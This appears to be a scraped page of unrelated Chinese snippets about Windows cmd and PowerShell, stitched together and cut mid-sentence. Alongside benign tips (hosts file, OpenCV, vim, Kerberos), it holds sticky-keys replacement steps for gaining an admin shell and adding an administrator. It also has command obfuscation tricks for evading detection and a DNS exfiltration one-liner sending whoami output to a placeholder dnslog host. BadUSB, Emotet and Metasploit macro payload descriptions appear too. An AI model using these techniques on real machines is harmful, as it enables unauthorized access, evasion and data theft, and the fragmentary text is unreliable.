注意:自己娱乐以及学习练习玩玩就好,用自己的靶机或者虚拟机进行测试娱乐,本人虚拟机进行操作的 原理 其实按下 5 次 shift 弹出的 粘带键 是一个程序,路径在 C:\Windows\System32...在非法关机下,下次启动会提示 ,点击修复这个时候就是最高管理权限,所有使用cmd就没有限制了,但是如果已经修复了的系统是无法完成利用这个漏洞修改用户开机密码的 步骤一 确认有这个 粘带键 按下 5 次...shift 弹出的这个 有这个漏洞就可以如下操作了 非法关机后重启 进入 启动启动修复(推荐) 这个选项 进入后点击 取消 让它修复即可,可能会很慢的具体看机器性能了 等一会就会出现如下界面...应用程序 复制cmd,然后粘贴到当前文件夹中 粘贴可以点一下垂直滚动条,然后在应用程序后面的空白处,右键粘贴 为了方便你可以将上面的cmd副本重命名为 aaa 继续找到 sethc...localgroup administrators 用户名 /add 案例: net localgroup administrators cjz /add 擦屁股 最好还原系统之前的东西,比如刚才改的 粘带键
步骤一 打开图中路径 找到【hosts】文件 查找hosts文件 查找hosts文件 步骤二 鼠标右键以管理员身份打开文件 选中文件点击左上角【文件】→【打开Windows PowerShell(R...)】→【以管理员身份打开Windows PowerShell(A)】 自动出现弹窗 输入【cmd】指令 输入代码【notepad hosts】 会以文本文件自动打开hosts文件 步骤三 将代码...203.208.40.66 translate.google.com 203.208.40.66 translate.googleapis.com 复制粘贴到hosts文件的最后行,点击保存。...步骤四 刷新DNS解析缓存 按win+r键,输入cmd指令,自动打开命令指令窗口 将代码ipconfig /flushdns 然后可以继续开心的使用自带的谷歌翻译功能了
Powershell标准模式(默认):鼠标右击选择标记后才能实现复制和粘切功能。 Powershell快速编辑模式:可以通过鼠标左键选择任意矩形区域内的文本,并且鼠标右击实现复制功能。...Powershell的快捷键和cmd以及linux中的shell 都比较像。...解释标准别名:PS 别名尝试兼顾清晰度和简洁性(可以进行缩写-进截取谓词第一个字母和名词的前两个字母) 比如: 熟悉 PowerShell 别名后就很容易猜到 sal 别名指的是 Set-Alias ,...启动PowerShell非常简单直接在CMD命令行之中: PowerShell PowerShell_ISE TIPS:默认键入一个字符串PS会将它原样输出,如果该字符串是一个命令或者启动程序...PS工作流程 工作流是一系列经过编程的连接步骤,会执行长期运行的任务,或是需要在多个设备或托管节点之间协调多个步骤。
验证是否成功 在anaconda中安装opencv 本人使用的是win10系统,anaconda版本为4.7.12,python版本为3.7.4 查询Python与anaconda版本 按win+r键后输入cmd...或者去国内清华镜像源下,网址分别如下: 1.国外网址 2.清华镜像源 先查到自己的python版本(查询方法上方有),我的是3.7.4,然后在网址中找到 cp37意思是python3.7版本,然后第一个是...下载后,把 .whl 文件复制,粘贴到anaconda中的site-packages文件夹中,如下图所示。...然后粘贴后,在这个文件夹中,按住shift单击右键打开cmd或者powershell窗口,powershell窗口是cmd窗口升级版(不知道什么时候更的。。)...验证是否成功 按win+r键后输入cmd,再输入 python 按回车,输入: import cv2 按回车,输入:(version左右有下划线,我真是醉了,要不是看截图我自己都忘了。。。)
一、安装Windows terminal Microsoft Store搜索Windows terminal 第一个和第二个都可以!!...将复制的主题代码粘贴到在list中,分别配置PowerShell的主题和cmd的主题,添加刚才获得代码即可应用对应的主题。name为标识,用于设置终端应用哪个主题。..."guid": "{61c54bbd-c2c6-5271-96e7-009a87ff44bf}", "name": "Windows PowerShell...", "commandline": "powershell.exe", "hidden": false,..."tabTitle": "PowerShell", "foreground": "#DCDCDC", "icon": "C:/Users/
配置文件设置set number (设置行号)set nocompatible (设置不兼容vi模式,不设置会导致许多vim特性被禁用)set clipboard=unnamed (设置普通的复制粘的内容和...不保存强行退出)移动命令h (左)j (下)k (上)l (右)复制、粘贴、剪切/删除、撤销、取消撤销y (复制)yw (向右复制一个单词)yb (向左复制一个单词,不包含自身)vy (复制当前游标对应的字母...)y$ (复制当前字符到行尾)y^ (复制当前字符到行首 )yG (从当前位置复制到文件结尾)yf+(任意字符), (从当前字符复制到任意字符)yy (复制当前一整行)p (粘贴)p (粘贴到游标所在行的下方...)shift + p 或者叫大写的P (粘贴到游标所在行的上方)d (剪切/删除)vd/x (删除当前游标所在的字符)dw (删除游标右边的单词)db (删除游标左边的单词)d$ (删除从当前游标到行尾...两者是相反的操作括号匹配% (当有多对括号时,会跳到对应的左括号/右括号, 适用于:(), [], {}, )综合应用如v + f + (任意字符) + d / y:表示先选中当前字符,再通过f +
例如,某些可执行文件可能会删除不可打印的字符,同时也可能会过滤掉某些可打印的字符。 例如,Windows 事件日志工具wevtutil接受在任意位置插入某些范围内的 Unicode 字符的命令行。...因此执行wevtutil gli hardwareeventsandwevtutil gࢯlihardwareevents将产生完全相同的输出,尽管后者在第一个参数的中间包含一个阿拉伯字母。...cmd例如,解决此问题的一种方法是将每个引号加倍,因此要获得如上所示的等效执行,您必须运行netsh ad""vfi""rewall show currentprofile state. (5) 简写...这方面的一个例子是 PowerShell,它的许多关键字允许您在关键字的末尾省略一个或多个字符。...除了这种“通配符方法”之外,PowerShell 在某些情况下也接受首字母缩写词,因此尽管屏幕截图中没有显示,/ec但也可以用作/encodedcommand.
,阿鑫就在这里简单总结一下我自己的一些方法吧,但是会的方法有比较少,后面在补充几个cmd/powershell平时常用的命令 技巧 (1)特殊符号/大小写 我们的"双引号,^尖角号,括号,逗号,分号,只能绕过一些常规的...axgg.txt axgg.txt (2)环境变量 当我们拿到一台机器,可以先set看看有哪些环境变量 就这样,%comspec:~3,1%hoa%comspec:~21,1%i,用我们环境变量的字母替换了...w和m 稍微解释哈,这里用环境变量截取字母第三位和第二十一位的w和m来绕过 当然,我们也可以自己设置环境变量,来达到绕过 set a=cmd /c whoami %a%即可 环境变量当然也可以配合我们的各类特殊符号...利用powershell的base64编码 当然,还可以fuzzing一下低版本的powershell powershell -version 3/2/1 利用windows的api Get-WmiObject...SET COMMAND whoami //加密你想执行的命令 关于cmd/powershell平时会用到的一些命令 (1)主机信息 qwinsta
安装完了Kerberos客户端会自动的在path里面加上了自己的目录,但是如果windows本地安装了Oracle JDK ,该JDK里面也带了一些 kinit, klist 等命令,所以需要把 Kberberos...打开cmd或者powershell,如果是下图则为正确。 ? 设置host,使Windows能通过host访问集群。...hosts 修改krb5.conf的配置 文件路径:C:\ProgramData\MIT\Kerberos5\krb5.ini 将Kerberos KDC所在主机的/etc/krb5.conf文件有选择的粘贴到...,在搜索栏内,搜索network.negotiate-auth.trusted-uris,双击将其值修改为集群节点ip或主机名,注意:这里如果修改为主机名的话,到时候访问的话,就以主机名访问,ip的话会失效...也可以用cmd或者powershell。 3.获取作业application_id 进入DAS,执行作业或者找到历史作业。 ? 找到需要查找的作业,点进详细信息。
因此我们可以通过别名覆盖任意powershell命令,因为别名的优先级最高。 函数:如果没有找到别名会继续寻找函数,函数类似别名,只不过它包含了更多的powershell命令。...命令:如果没有找到函数,控制台会继续寻找命令,即cmdlet,powershell的内部命令。 脚本:没有找到命令,继续寻找扩展名为“.ps1”的Powershell脚本。...文件:没有找到脚本,会继续寻找文件,如果没有可用的文件,控制台会抛出异常。...# 通过netstat查看网络端口状态 netstat # 通过IPConfig查看自己的网络配置 ipconfig # 启动CMD控制台键入cmd或者cmd.exe, 而退出cmd可以通过命令exit...Tips: 字符串比较时是模仿忽略大小写并且大小写敏感比较时小写字母小于大写字母。
exec(); shell_exec(); passthru(); escapeshellcmd(); pcntl_exec(); preg_replace( ) 代码执行 preg_replace() 的第一个参数如果存在...> 若无 /e 修饰符,则可以尝试 %00 截断。 重定向 cmd > file 把cmd命令的输出重定向到文件file中。...cmd >| file 功能同>,但即便在设置了noclobber时也会复盖file文件,注意用的是|而非一些书中说的!,目前仅在csh中仍沿用>!实现这一功能。...: > filename 把文件filename截断为0长度。如果文件不存在, 那么就创建一个0长度的文件(与touch的效果相同)..../F "delims= tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info for /F %x in ('whoami') do powershell
tcp协议会根据Nagle算法将时间间隔短,数据量小的多个数据包打包成一个数据包,先发送到自己操作系统的缓存中,然后操作系统将数据包发送到目标程序所对应操作系统的缓存中,最后将目标程序从缓存中取出,而第一个数据包的长度...,应用程序并不知道,所以会直接取出数据或者取出部分数据,留部分数据在缓存中,取出的数据可能第一个数据包和第二个数据包粘到一起。...如连续几次下需要send的数据都很少,通常TCP会根据优化算法把 这些数据合成一个TCP段后 一次发送出去,这样接收方就收到了粘包数据 TCP(transport control protocol,传输控制协议...,但是会丢数据,不可靠 tcp的协议数据不会丢,没有收完包,下次接收,会继续上次继续接收,己端总是在收到ack时才会清除缓冲区内容。...数据是可靠的,但是会粘包。
本来想把这篇的内容包括在我的Powershell系列文章之内的,后来写完之后才想起来,这时候我已经复制粘贴到简书、CSDN和SegmentFault三个地方了。所以这一篇干脆单独写成一篇文章。...这个方法有三个参数,第一个指定环境变量名称,第二个指定环境变量的值,第三个指定环境变量类型(Process是仅当前进程有效,User是用户级别,Machine是系统环境变量且需要管理员权限)。...", $classpath, "Machine") [Environment]::SetEnvironmentVariable("PATH", $path , "Machine") 最后,打开一个新的CMD...或者是Powershell窗口,输入一下两条命令测试环境变量是否配置正确。...SetEnvironmentVariable("PATH", $path , "Machine") Write-Host "配置JDK环境变量成功" 因为这篇文章写出了可能就不会再更新了,而Github上脚本还可能会继续更新
和 PowerShell 中是不能用的。...cmd 中批处理命令# 在cmd中用 % 标识变量,如果是批处理程序执行bat文件中需要使用 %% 来表示变量如 %%i# 在cmd小黑窗窗口中for %i in (xxx) do command# 在...元素可以是变量、字符串,元素之间用空格键、tab键、逗号、分号或等号分隔xxx必须用()包围,即使只有一个元素%%I是形式变量,即使没有在command中被使用,也不能省略for语句的形式变量I,可以换成26个字母中的任意一个...,这些字母会区分大小写,也就是说,%%I和%%i会被认为不是同一个变量为了不与批处理中的%0~%9这10个形式变量发生冲突,请不要随意把%%I替换为%%0~%%9中的任意一个for语句依次提取(xxx)...中的条件和循环这些和普通的编程语言比较像,PowerShell 中实现换行多行命令输入,按住 ctrl + Enter# -lt:小于 (less than)for($i=0;$i -lt 10;$i
num[]= 原理数组绕过,具体我不太明白,看了别的师傅的WP 看懂了,intval() 函数会对num进行转换,如果num是个数组的话,会导致转换失败。...转换失败即转为1.if(1)执行输出flag web90 这题禁止传4476,但想出flag还得要4476 直接浮点数走了 当然截断也行. ...整乐了 web91 show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)...还得读flag.php 那php咋开头捏 截断一下直接传 web92 这题也是,第一个If不能走,走第二个,差别在于intval函数 直接16进制绕过 web93 这题加了个判断,不让传字母,...第一个if不让传4476,第二个进制字母+点,第三个堵死进制 没办法了呜呜呜。超超 web96 这题有点迷 官方给的解释是 ?u=./flag.php or ?
history.csv" 其中需要考虑字符”|”,”$”和”””,模拟键盘输入时需要加Shift键 的这里实现方法的英文先使用keybd_event按下Shift键,再用PostMessage发送按键的字母...的历史记录 命令如下: doskey /h 清空: doskey /reinstall 也可以通过发送键盘消息的方式导出的cmd.exe的命令历史记录 2,获取-PSReadlineOption...安装后,所有Powershell的命令的历史记录会保存在同一位置,可随时查看。 1....0x03防御建议 如果使用高版本的视窗系统,如Win10,默认PowerShell的版本为5.0,会记录PowerShell的的命令,建议定时进行清除,位置:%appdata%\Microsoft\Windows...对于低版本的Powershell的,如果命令中包含敏感信息(如远程连接的口令),需要及时清除,命令为:Clear-History 对于cmd.exe的,如果命令中包含敏感信息(如远程连接的口令),需要及时清除
步骤变成了 Win+M(最小化)->Win+R(运行)->按下CapsLock锁定大小写->输入CMD->输入PAYLOAD 最小化可以避免把payload输进其他应用,大小写锁定主要为了避免中文输入法干扰...Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop() { } 关于url为什么是http://192.168.239.249/1,要/1用数字不是其他字母呢...这里的powershell的payload是从服务器上下载的CS负载,下载后在内存中运行也可以免杀的效果。...,所以我用了插件使得他会自动迁移,更具体的会写在Cobalt Strick的PowerShell免杀。...badusb使用倒不困难,困难的还是如何做好PowerShell的免杀。
当然了,这个文档将会引诱目标用户启用嵌入在其中的恶意宏: 接下来的攻击步骤跟之前的Emotet活动类似:恶意宏会利用下列字符串作为参数并执行cmd.exe: 脚本中包含了一些用于实现混淆处理的代码,用于在多个变量中隐藏字符串...“powershell”,攻击者对其进行了编译并会在攻击的下个阶段中执行这部分恶意代码。...简而言之,这是一个无文件型的PowerShell Payload。...脚本: 环境变量“comspec”中包含了指向cmd.exe的路径地址,并会通过字符串“iex”来调用Invoke-Expression: 跟之前的Emotet攻击不同的是,Emotet Grinch选择使用三重...第一层使用了“MaximumDriveCount”: 第二层使用了“$Shellid”变量: 第三层使用了“$VerbosePreference”: 这种混淆技术还结合了字符串替换技术(例如使用字母“C
victim端打开此文档后启用宏之后,会执行相关的宏代码连接到Metasploit的客户端,使用shell命令可以可以获得一个命令行对应的windows系统此时应该会拉起一个cmd.exe ? ?...->cmd.exe ?...待用户执行了宏代码之后,会调用windows系统的当中的wmi拉起powershell进行下载并连接远程CC端。 关键代码如下: ? 可以在第一个powershell.exe的启动参数找到痕迹 ?...第一个powershell.exe之后拉起第二个powershell.exe执行保存在payload.txt里面的恶意代码,会设置自启动。 ?...之后在执行了shell命令执行,第二个powershell.exe会主动拉起一个cmd.exe 进行远程命令执行。
对很多IT专业人士来说,Powershell的确是Windows系统中一个相当强大的工具,而且微软也有意将PowerShell作为Windows系统的默认命令行工具。...PowerShell脚本甚至不需要以文件为载体就能感染目标,因此越来越多银行木马和其他类型的威胁都选择了PowerShell。...而在这111例中,仅有8%的恶意软件使用了如大小写混合字母之类的混淆技术;没有脚本会对命令参数做随机化之类的混淆。...研究人员还提到,在今年观察的10797个PowerShell脚本中——也包括那些没有恶意的脚本,55%的脚本是以cmd.exe开始执行的。 如果只考虑恶意脚本,95%都是通过cmd.exe执行。...而且为了能够保证存在的持久性,PowerShell也会安排任务、替换启动文件夹中的脚本、采用组策略或者WMI、感染本地配置文件,在注册表中存储脚本(如2014年的Trojan.Poweliks)等。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
